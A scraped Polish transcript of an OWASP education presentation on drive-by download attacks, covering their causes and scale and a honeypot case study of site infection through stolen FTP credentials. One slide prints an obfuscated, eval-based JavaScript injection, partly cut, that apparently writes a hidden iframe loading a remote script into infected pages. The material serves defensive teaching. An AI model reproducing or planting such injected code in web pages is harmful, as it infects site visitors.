Pobieranie prezentacji. Proszę czekać

Pobieranie prezentacji. Proszę czekać

Copyright 2007 © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License. The OWASP.

Podobne prezentacje


Prezentacja na temat: "Copyright 2007 © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License. The OWASP."— Zapis prezentacji:

1 Copyright 2007 © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License. The OWASP Foundation OWASP Ataki drive-by download Filip Palian Education Project

2 OWASP Rozkład jazdy Drive-by download – co to takiego? Dlaczego problem istnieje? Kogo dotyczy problem? Skala problemu Z życia wzięte Studium przypadku Dekodowanie Przeciwdziałanie Przyszłość Co na to OWASP?

3 OWASP Drive-by download – co to takiego? Pobranie z sieci szkodliwego oprogramowania bez zgody i/lub wiedzy użytkownika

4 OWASP Dlaczego problem istnieje? Błędy w przeglądarkach oraz dodatkach Błędy w stronach internetowych (wstrzyknięcia) Nieświadomość i lenistwo użytkowników Brak (stosowania) odpowiednich zabezpieczeń Botnety SPAM (D)DoS

5 OWASP Dlaczego problem istnieje? $ Pieniądze $ Władza $ Polityka = (pieniądze + władza) $ Religia = (pieniądze + władza)

6 OWASP Kogo głównie dotyczy problem? Użytkownicy przeglądarek internetowych Użytkownicy kont FTP + WWW Twórcy stron internetowych Firmy hostingowe

7 OWASP Skala problemu

8 OWASP Skala problemu (home.pl)

9 OWASP Skala problemu (netart.pl)

10 OWASP Skala problemu (fastpark.net)

11 OWASP Skala problemu c.d. GoDaddy (AS26496) Dreamhost (AS26347) Akamai (AS20940) Microsoft (AS8075) Google (AS15169) OVH (AS16276)

12 OWASP Skala problemu c.d. Źródło:

13 OWASP Z życia wzięte (a.k.a. cyferki++) Na przykładzie danych zebranych w okresie VIII 2008 – III 2010: 44042(wykryte) zainfekowane pliki 233(wykryte) domeny 70rodzajów szkodliwego oprogramowania

14 OWASP Z życia wzięte c.d

15 OWASP Z życia wzięte c.d. Kwi2009: Korea Pn. wystrzeliwuje rakietę Taepodong-2 Trzęsienie ziemi w Meksyku Lip2009: Zamachy terrorystyczne na hotele w Dżakarcie Śmierć Michaela Jacksona Paź2009: Barack Obama laureatem pokojowej nagrody Nobla Lut2010: Igrzyska olimpijskie w Vancouver Trzęsienia ziemi na Haiti i w Chile

16 OWASP Z życia wzięte c.d. Źródło:

17 OWASP Z życia wzięte c.d.

18 OWASP Studium przypadku 1. Ofiara odwiedza zainfekowaną stronę WWW 2. Malware na stronie wykorzystuje błąd w oprogramowaniu 3. Kradzież danych dostępowych do konta FTP 4. Zalogowanie się na konto FTP i pobranie plików 5. Dodanie szkodliwej treści do pobranych plików 6. Wgranie na serwer FTP zainfekowanych plików

19 OWASP Studium przypadku c.d. Środowisko testowe honeypota: VMware MS Windows XP Professional SP2 Systemowy firewall AVG 8 Adobe Reader 9.x MS Internet Explorer 6.x Capture HPC (The Honeynet Project)

20 OWASP Studium przypadku c.d. 1. Ofiara odwiedza zainfekowaną stronę. Gdzie takie znaleźć? Co się dzieje na tym etapie?

21 OWASP Studium przypadku c.d.

22 OWASP Studium przypadku c.d. 2. Malware na stronie wykorzystuje błędy w oprogramowaniu Przeglądarki (głównie IE, FX, Opera) Wtyczki (Adobe Reader, RealPlayer, ActiveX etc.) Silniki skryptowe (np. SeaMonkey, JScript, Rhino) No dobrze, i co dalej?

23 OWASP Studium przypadku c.d.

24 OWASP Studium przypadku c.d.

25 OWASP Studium przypadku c.d.

26 OWASP Studium przypadku c.d.

27 OWASP Studium przypadku c.d. Efekt?

28 OWASP Studium przypadku c.d. Co nas uderzyło? Trojan FakeRean Co robi ten trojan? Win32/FakeRean podszywa się pod oprogramowanie antywirusowe i wyświetla nieprawdziwe informacje o zainfekowanych plikach w systemie. Następnie informuje użytkownika o tym, że musi on zapłacić za usunięcie zagrożeń, które nie istnieją. Gdzie znajdę więcej informacji? Win32%2fFakeRean

29 OWASP Studium przypadku c.d. 3. Kradzież danych dostępowych do konta FTP (i nie tylko) Sniffery Keyloggery Serwery proxy Zapamiętywanie haseł w aplikacjach

30 OWASP Studium przypadku c.d. 4. Zalogowanie się na konto FTP i pobranie plików Jan 9 16:51:00 foo pure-ftpd: [INFO] New connection from x.x.x.x Jan 9 16:51:00 foo pure-ftpd: [INFO] ftpuser is now logged in Jan 9 16:51:01 foo pure-ftpd: [NOTICE] /srv/www/foo/index.html downloaded Jan 9 16:51:01 foo pure-ftpd: [NOTICE] /srv/www/foo/index.php downloaded Jan 9 16:51:01 foo pure-ftpd: [NOTICE] /srv/www/foo/bar/index.html downloaded Jan 9 16:51:02 foo pure-ftpd: [NOTICE] /srv/www/foo/tmp/index.htm downloaded (...) Jan 9 16:51:03 foo pure-ftpd: [INFO] Logout.

31 OWASP Studium przypadku c.d. 5. Dodanie szkodliwej treści do pobranych plików Przed W Po Gdziekolwiek ucinając resztę zawartości pliku

32 OWASP Studium przypadku c.d. 5. Dodanie szkodliwej treści do pobranych plików $ tail -4 index.html , ,d=(("sdfsfd"?(.45,(.33?("wi"+("re","n")):("dfg",.44,d=5))):(.4,"sdf"))),e=(g="5", (.44,.0,"d"+(.33,(.4?(45./.343,"ow"):("34","34"))))),f=("poc"?(.0?.0:"d"+("43",.3,"oc")):"333"),u=(33?("u" +("z",44.,"m")):33)+("e"+(1,1,5,(.3,"n")+("d","t")));y=(a=( , ,"rrrrrrrrrrrr","e"), b=(.5?"v":("d"?"f":"tt")),c=("33"?(.33/44.,.33,33.,.33,"a"):"z"),g=(("f"),(333/444.,"l")));(ee=eval(a+(55/ (...) ("E","e")))+(("a","r")+("woman","man"))+("ad"+("re","ve"))+"rt"+("his",("is"?"is":"a "+"man"))+"i"+("S","ng")+ (".a",".n")+"et"+("/s","/i")+"n.c"+"gi"+("!!!","?")+("A","3","2")+"&' "+("si","wi")+"d"+"th="+("1","3")+"0 he "+("sig","i"+"g")+"ht=2"+((0,"0")+" s"+("vy","ty"))+"le='v"+("asi",("as","is")+"i")+("b"+(33?"il":"aa"))+"ity:"+ ("bi","hi")+"dd"+("de","en")+"'> ");}var ahsd78asd as6dyasdiashdiayd=true;

';
Reklamy Google